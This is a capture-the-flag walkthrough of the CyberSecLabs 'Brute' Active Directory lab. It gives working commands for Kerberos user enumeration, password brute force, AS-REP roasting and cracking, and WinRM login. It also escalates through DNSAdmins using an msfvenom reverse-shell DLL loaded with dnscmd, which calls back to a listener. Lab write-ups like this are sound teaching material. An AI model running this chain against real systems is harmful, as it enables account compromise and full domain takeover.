CyberSecLabs "Brute" Walkthrough

Brute is the newest Active Directory release from CyberSecLabs.  In today's walkthrough we will be utilizing a tool called Kerbrute to enumerate Domain users via an attack called ASREProasting, which takes advantage of user accounts in Kerberos that don't require preauthentication. Preauthentication is required in Active Directory environments by default.  In typical Microsoft fashion, they've included a feature that allows misconfiguration by setting user settings to not require Kerberos preauthentication.  Finally, we will work on privilege escalation through a neat exploit taking advantage of DNS administrative privileges.  So let's get started!

Scanning

We begin with scanning the target to determine what services and ports are available.

nmap 172.31.3.3

nmap -A 172.31.3.3

Once the scan is in we can immediately determine that we are working with an Active Directory machine.  We can see that the domain is brute.csl, along with which we should add to our /etc/hosts file.  Additionally, we know that Kerberos is present, which is a good opportunity to try to enumerate possible user accounts.  So let's get enumerating.

Enumeration

A tool called Kerbrute (located here) can be used to enumerate user accounts on the Active Directory environment.  I use the wordlists I host here on Github for Kerbrute, and I welcome you to use them, however you are welcome to use whichever list you would like.  Once you've installed Kerbrute we can get started.

kerbrute userenum --dc brute.csl -d brute.csl bruteusers.txt

You should receive several usernames in the results, which provides you with a list of possible domain users.  We can take a couple of different paths here now.  One way is to try to brute force username and password combinations, which you can see me do with Tess below.

kerbrute bruteuser --dc brute.csl -d brute.csl kerbrutepass.txt tess

This will however take some time.  As you see, the password list I used caught the password at #7390.  Alternatively we can use a tool called GetNPUsers.py to grab an ASREP ticket that we can try to crack using John.

GetNPUsers.py -dc-ip 172.31.3.3 brute.csl/tess -no-pass

 Exploitation

 John is able to crack ASREP hashes pretty quickly.  Let's get to work on that.  Save your hash to a file and run john.  In this case, John's included password list makes quick work of it.

john tocrack

Now that we have a username and password we can try to log on to the machine.  We can use Evil-WinRM for this.

evil-winrm -i 172.31.3.3 -u tess -p password

 It's important to check user privileges in any environment, especially an Active Directory one.  We can do this with net user, and we see that the Tess user is a DNS Admin for some reason.  Some quick research on exploiting DNS Admin users shows that the DNS Admin account is able to modify DNS .dll settings, including hijacking a legitmate one and replacing it with a malicious payload.  We need to first make our payload. Keep in mind that you need to use an x64 payload in this instance for it to work correctly.  (My below image should have this and doesn't).

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.0.7 LPORT=1234 -f dll > pwn.dll

 We can then use Evil-WinRM's upload function to upload the payload to the machine for use.  Additionally we need to run the command seen below to modify the DNS server to use our malicious payload.

upload pwn.dll; dnscmd /config /serverlevelplugindll C:\Users\Tess\Documents\pwn.dll

Once we have done this we need to open a netcat listener, and fire off a couple additional commands to stop and start the DNS service.  Once we've done that, we should get a reverse shell and own the machine.  From here you can grab user flags, modify or add users, access to server via RDP, and so much more.

Bottom - nc -nlvp 1234; Top - sc.exe stop dns; sc.exe start dns

 Final Thoughts

Brute is another example of how Microsoft "features" are vulnerable to attacks due to the sheer amount of configurations required to make the Active Directory function properly.  System Administrators should take note that this attack is incredibly straight forward and fairly easy to conduct with easy to use tools and processes.  I hope you've learned something today, and I look forward to seeing you all again soon.